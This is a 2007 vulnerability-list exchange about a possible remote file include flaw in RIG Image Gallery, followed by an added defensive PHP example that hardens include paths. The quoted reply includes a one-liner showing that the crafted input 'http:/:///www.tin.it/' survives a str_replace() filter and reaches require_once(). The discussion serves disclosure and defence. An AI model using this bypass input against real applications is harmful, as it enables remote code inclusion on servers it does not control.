[VIM] WTF: RIG Image Gallery (dir_abs_src) Remote File Include Vulnerability

George A. Theall theall at tenablesecurity.com
Tue Jul 31 13:26:39 UTC 2007


On 07/31/07 11:09, ascii wrote:

> George A. Theall wrote:
>> But regardless, the str_replace() later on in rig_check_src_file()
>> would certainly void the possibility of a remote file include attack.
> 
> I'm not saying that the product is vulnerable but that this statement
> is completely flawed, 
...
> php -r '$name="http:/:///www.tin.it/"; $name = str_replace("..", ".",
> str_replace("://", "", $name)); echo $name."\n"; require_once($name);'
> http://www.tin.it/

You're right, of course. But along with the register_globals check it 
does prevent the example exploit from working.

George
-- 
theall at tenablesecurity.com
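The point conceded above, as an added example that is not part of the original thread or of RIG's code: a single-pass str_replace() filter can assemble the very token it removes, so include paths are better validated by resolving them and rejecting anything outside a fixed directory. legacy_filter() reproduces the expression quoted in the thread; resolve_local_include(), the temporary directory and album.php are hypothetical names constructed for the demonstration.

```php
<?php
// The filter expression quoted in the thread, reproduced unchanged.
function legacy_filter(string $name): string
{
    return str_replace("..", ".", str_replace("://", "", $name));
}

// Hypothetical hardened check (not RIG code): accept a name only if it
// resolves to an existing file underneath $baseDir.
function resolve_local_include(string $name, string $baseDir): ?string
{
    // Reject NUL bytes and anything that starts with a scheme/stream wrapper.
    if (strpos($name, "\0") !== false
        || preg_match('#^[a-z][a-z0-9+.\-]*:#i', $name)) {
        return null;
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    if ($base === false || $real === false) {
        return null; // base missing or target does not exist
    }
    // The canonical path must still be inside the base directory.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($real, $prefix, strlen($prefix)) === 0 ? $real : null;
}

// Constructed sandbox: one legitimate file in a temporary directory.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'rig_demo_' . getmypid();
mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'album.php', "<?php\n");

$inputs = [
    'album.php',              // constructed benign name
    'http:/:///www.tin.it/',  // the input quoted in the thread
];
foreach ($inputs as $in) {
    $filtered = legacy_filter($in);
    $stillUrl = (bool) preg_match('#^[a-z][a-z0-9+.\-]*://#i', $filtered);
    $resolved = resolve_local_include($in, $base);
    printf("input=%s\n  legacy filter -> %s (URL survives: %s)\n  hardened -> %s\n",
        $in, $filtered, $stillUrl ? 'yes' : 'no', $resolved ?? 'rejected');
}

// Remove the constructed sandbox.
unlink($base . DIRECTORY_SEPARATOR . 'album.php');
rmdir($base);
```

Nothing is included or fetched here; the script only prints what each check returns for the two inputs.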

